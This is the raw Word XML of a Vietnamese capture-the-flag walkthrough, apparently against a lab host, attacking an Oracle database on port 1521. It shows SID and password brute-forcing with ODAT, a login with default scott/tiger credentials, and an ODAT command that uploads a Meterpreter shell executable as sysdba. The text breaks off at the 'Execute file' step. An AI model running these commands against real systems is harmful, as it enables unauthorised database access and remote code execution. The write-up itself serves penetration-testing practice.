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1ECAD" w14:textId="664E8151" w:rsidR="002F49FE" w:rsidRDefault="00035675">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67175160" wp14:editId="38218212">
            <wp:extent cx="5943600" cy="5427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5427980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3FD41" w14:textId="35D797FB" w:rsidR="00E2334B" w:rsidRDefault="00E2334B"/>
    <w:p w14:paraId="2AEE4B48" w14:textId="70D37C06" w:rsidR="00E2334B" w:rsidRPr="00B275EF" w:rsidRDefault="005A5A44" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B275EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oracle TCP 1521</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C49F5FA" w14:textId="3C6E6524" w:rsidR="005A5A44" w:rsidRDefault="005A5A44" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722AF084" w14:textId="3C9137A6" w:rsidR="005A5A44" w:rsidRDefault="008B285F" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Không biết gì về Oracle tôi chạy tất cả nmap Oracle script để chống lại nó. Chỉ có oracle-sid-brute chạy và nó trả về XE. Điều này có nghĩa là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10C2DB" w14:textId="60102672" w:rsidR="008B285F" w:rsidRDefault="008B285F" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669FC9EA" w14:textId="2B198A41" w:rsidR="008B285F" w:rsidRDefault="00E95AA8" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6DA1F6" wp14:editId="2AF8EFF0">
            <wp:extent cx="5943600" cy="1797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1797685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD99EB5" w14:textId="70AA36FB" w:rsidR="00E95AA8" w:rsidRDefault="00E95AA8" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0C21FC" w14:textId="4A75385D" w:rsidR="00E95AA8" w:rsidRDefault="005A1218" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oracle database không giống với MySQL, vì vậy mình phải hiểu phương pháp để bẻ khóa nó. Đầu tiên tôi cố gắng liệt kê phiên bản của listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0019E9" w14:textId="34EEB61E" w:rsidR="005A1218" w:rsidRDefault="005A1218" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CD78C3" w14:textId="12655AC8" w:rsidR="005A1218" w:rsidRDefault="005A1218" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47079C52" wp14:editId="5293FD32">
            <wp:extent cx="5943600" cy="176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765300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558688C" w14:textId="79EDC6BE" w:rsidR="005A1218" w:rsidRDefault="005A1218" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31EE667B" w14:textId="33CEB3D6" w:rsidR="005A1218" w:rsidRDefault="00BD75F9" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tôi đọc bài viết của Oracle, Code 1189 là lỗi chưa xác thực. Tuy vậy, tôi vẫn tiếp tục vì HackTricks nói nó k</w:t>
      </w:r>
      <w:r w:rsidR="00B275EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hông cần thiết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5E46C" w14:textId="77A8C83E" w:rsidR="00B275EF" w:rsidRDefault="00B275EF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2116D787" w14:textId="6B0508C6" w:rsidR="00B275EF" w:rsidRPr="00B275EF" w:rsidRDefault="00B275EF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B275EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bruteforcing SIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E93D5" w14:textId="04EA2E9F" w:rsidR="00B275EF" w:rsidRDefault="00B275EF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270B2DE1" w14:textId="24E43DE3" w:rsidR="00B275EF" w:rsidRDefault="00B275EF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Một trong những việc chúng ta cần làm là khám phá các tên SIDs, vì Oracle không như MySQL yêu cầu bạn chỉ định SID cùng với thông tin đăng nhập để kết nối. Nếu bạn tìm trên Google sẽ thấy một công cụ chỉ để kiểm thử Oracle là ODAT. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326F1F3" w14:textId="681CE8DE" w:rsidR="00B275EF" w:rsidRDefault="00B275EF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381E7493" w14:textId="76EDB29A" w:rsidR="00B275EF" w:rsidRDefault="00B275EF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Để tấn công dồn dập sids bạn có thể dùng hydra hoặc odat. Tôi tải wordlist ở đây và chạy </w:t>
      </w:r>
      <w:r w:rsidR="004E7334">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>odat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E9B755" w14:textId="7C2AF53E" w:rsidR="004E7334" w:rsidRDefault="004E7334" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170F42AA" w14:textId="594D68F0" w:rsidR="004E7334" w:rsidRDefault="00453CD6" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453CD6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://secybr.com/assets/file/sids-oracle.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFA6E4" w14:textId="18723B4B" w:rsidR="00453CD6" w:rsidRDefault="00453CD6" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71596424" w14:textId="77777777" w:rsidR="00453CD6" w:rsidRDefault="00453CD6" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299B8C9E" w14:textId="06F20D1A" w:rsidR="00B275EF" w:rsidRDefault="000066D9" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F02B6FB" wp14:editId="6B03AC33">
            <wp:extent cx="5943600" cy="2993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0EED5991" w14:textId="4291CF37" w:rsidR="000066D9" w:rsidRDefault="000066D9" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC74C04" w14:textId="7FA1E1CC" w:rsidR="000066D9" w:rsidRDefault="006579FF" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006579FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bruteforce creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B93D4" w14:textId="097316F1" w:rsidR="0066049A" w:rsidRPr="002948B5" w:rsidRDefault="0066049A" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002948B5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./odat passwordguesser -d XE -s 10.10.10.82 -p 1521 --accounts-files accounts/users-oracle.txt accounts/pass-oracle.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680883F" w14:textId="1F43D6BF" w:rsidR="00B275EF" w:rsidRDefault="00B11888" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C488CB0" wp14:editId="42B68AA5">
            <wp:extent cx="5943600" cy="1316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16355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="089223E6" w14:textId="6977DF1B" w:rsidR="0066049A" w:rsidRDefault="0066049A" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B7039F" w14:textId="6FF8DAFC" w:rsidR="0066049A" w:rsidRDefault="00A32D31" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tôi đã hủy nó vì mất rất nhiều thời gian nhưng cuối cùng nó vẫn tìm thấy tài khoản scott/tiger có SID là XE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5F454" w14:textId="4EAAFAE1" w:rsidR="00A32D31" w:rsidRDefault="00A32D31" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106764B4" w14:textId="60183971" w:rsidR="00A32D31" w:rsidRPr="002948B5" w:rsidRDefault="00A32D31" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002948B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumerate Oracle DB with sqlplus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6091F9" w14:textId="1BFEE669" w:rsidR="00A32D31" w:rsidRDefault="00A32D31" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDA0FC1" w14:textId="68EE427C" w:rsidR="00E05CD9" w:rsidRDefault="00E05CD9" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sqlplus giống như Oracle client giúp bạn tương tác với Oracle database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17798211" w14:textId="2B7F72AF" w:rsidR="00E05CD9" w:rsidRDefault="00E05CD9" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535F795E" w14:textId="66818524" w:rsidR="00E05CD9" w:rsidRDefault="004A0911" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2722">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlplus scott/tiger@10.10.10.82:1521/XE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD96F7" w14:textId="7CF52FE2" w:rsidR="004A0911" w:rsidRDefault="004A0911" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653AED1B" w14:textId="75AA4A0E" w:rsidR="004A0911" w:rsidRDefault="00665F68" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE3F745" wp14:editId="04CB2CDE">
            <wp:extent cx="5943600" cy="2966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2966720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7F00D" w14:textId="7CF0EB06" w:rsidR="00244A0C" w:rsidRDefault="00244A0C" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4175503F" w14:textId="73215AF6" w:rsidR="00244A0C" w:rsidRDefault="00244A0C" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61AB93EA" wp14:editId="53255E7F">
            <wp:extent cx="5943600" cy="1610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943600" cy="1610995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C292E77" w14:textId="42E84D78" w:rsidR="00AC5F14" w:rsidRDefault="00AC5F14" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5B9397" w14:textId="73463A4C" w:rsidR="00A32D31" w:rsidRPr="000F2722" w:rsidRDefault="000F2722" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2722">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683761A7" w14:textId="2FAA412D" w:rsidR="000F2722" w:rsidRDefault="000F2722" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31931857" w14:textId="12EFB1BD" w:rsidR="000F2722" w:rsidRDefault="00651A04" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Với SID và tài khoản trong tay, có thể tải bất kì tập tin nào và thực thi nó với utlfile và externaltable trong ODAT. Lưu ý là phải có flag --sysdba </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10824F51" w14:textId="72299DFB" w:rsidR="00651A04" w:rsidRDefault="00651A04" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419E91EE" w14:textId="55629950" w:rsidR="00651A04" w:rsidRDefault="007A157B" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C5DC0B" wp14:editId="3A010D28">
            <wp:extent cx="5943600" cy="1434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1434465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A06D7A" w14:textId="5AA4DEB7" w:rsidR="007A157B" w:rsidRDefault="007A157B" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0200E701" w14:textId="24229D7E" w:rsidR="006839CB" w:rsidRPr="006839CB" w:rsidRDefault="006839CB" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Upload file:  </w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">./odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ </w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter-shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter-shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25927FF3" w14:textId="2A707E78" w:rsidR="007A157B" w:rsidRDefault="005560B6" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6B3A6F" wp14:editId="28C973BB">
            <wp:extent cx="5943600" cy="1314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1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA356CC" w14:textId="77777777" w:rsidR="006839CB" w:rsidRDefault="006839CB" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F24ADA" w14:textId="77777777" w:rsidR="006839CB" w:rsidRDefault="006839CB" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162A3760" w14:textId="44B1DEEF" w:rsidR="005560B6" w:rsidRPr="006839CB" w:rsidRDefault="006839CB" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute file:  </w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
